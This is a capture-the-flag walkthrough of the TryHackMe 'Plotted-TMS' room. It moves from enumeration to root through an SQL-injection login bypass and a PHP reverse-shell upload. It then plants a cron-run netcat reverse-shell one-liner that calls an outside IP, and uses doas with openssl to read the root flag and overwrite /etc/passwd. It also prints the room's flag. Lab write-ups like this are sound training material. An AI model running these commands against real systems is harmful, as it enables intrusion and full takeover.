Plotted-TMS (FileUpload, Cronjob, Openssl)

First, we need to enumerate using nmap.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/plotted-tms  
╰─➤  nmap -A 10.10.44.17 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-03 22:32 +0630
Nmap scan report for 10.10.44.17
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
445/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.19 seconds

SSH and HTTP ports are open. Let's enumerate HTTP. We will see index of the apache is open.

So, we will check web directory using gobuster. We can't scan at default port 80. Change port to 445. There are too many errors while scanning. But we found a directory called management

╭─hnl@hnl ~/Desktop/ctf/tryhackme/plotted-tms  
╰─➤  gobuster -u http://10.10.44.17:445/ -w /usr/share/wordlists/directory-list-2.3-medium.txt 

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.44.17:445/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2022/04/03 22:37:56 Starting gobuster
=====================================================
2022/04/03 22:38:08 [!] Get http://10.10.44.17:445/news: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
2022/04/03 22:38:08 [!] Get http://10.10.44.17:445/download: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
2022/04/03 22:38:08 [!] Get http://10.10.44.17:445/index: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
2022/04/03 22:38:08 [!] Get http://10.10.44.17:445/crack: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
2022/04/03 22:38:08 [!] Get http://10.10.44.17:445/full: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
2022/04/03 22:38:08 [!] Get http://10.10.44.17:445/2006: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
......
/management (Status: 301)

When you go to http://10.10.44.17:445/management/, you will see login button and click it. It will point you to http://10.10.44.17:445/management/admin/login.php. We can bypass using simple sqli methods like admin' or '1'='1.

It will redirects to you to system administrators page.

In system logo, upload a php reverse shell files. And then you will get a revere shell.

With a lot of enumeration, I found a cronjob which is running with plot_admin privileges.

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * 	* * *	plot_admin /var/www/scripts/backup.sh
#
$

We can change the file name backup.sh to backup.sh.bak. And then replace with our reverse script file.

$ mv backup.sh backup.sh.bak
$ echo "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.2.121 9002 >/tmp/f" > backup.sh

In netcat sessions, we got reverse shell with plot_admin privileges.

Find setuid file using find commands. I will hightlight some interesting files.

$ find / -user root -perm -4000 2>/dev/null
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/chfn
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/umount
/usr/bin/doas
/usr/bin/newgrp
/usr/libexec/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

/usr/bin/doas is quiet interesting. First, we will analyze file type. The configuration of /usr/bin/doas is located at /etc/doas.conf.

$ file /usr/bin/doas
/usr/bin/doas: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=23fd22b4442d53990d636eff1a4d5b1609db9a99, for GNU/Linux 3.2.0, stripped

$ cat /etc/doas.conf
permit nopass plot_admin as root cmd openssl

Is it a hint? Can we run openssl command using root privileges. Let's try this. Here is a link https://gtfobins.github.io/gtfobins/openssl/. The below part is the reading root flag.

$ LFILE=/root/root.txt
LFILE=/root/root.txt
$ /usr/bin/doas -u root openssl enc -in "$LFILE"
/usr/bin/doas -u root openssl enc -in "$LFILE"
Congratulations on completing this room!

53f85e2da3e874426fa059040a9bdcab

Hope you enjoyed the journey!

Do let me know if you have any ideas/suggestions for future rooms.
-sa.infinity8888

The below part is to get root shell access.

$ LFILE=/etc/passwd
$ echo 'root::0:0:root:/root:/bin/bash' | /usr/bin/doas -u root openssl enc -out "$LFILE"
$ su root
su root
root@plotted:/home/plot_admin#

PreviousOh My Webserver (CVE-2021-41773, Capabilities, Docker, CVE-2021-38647)NextInsekube (Kubernetes)

Last updated 3 years ago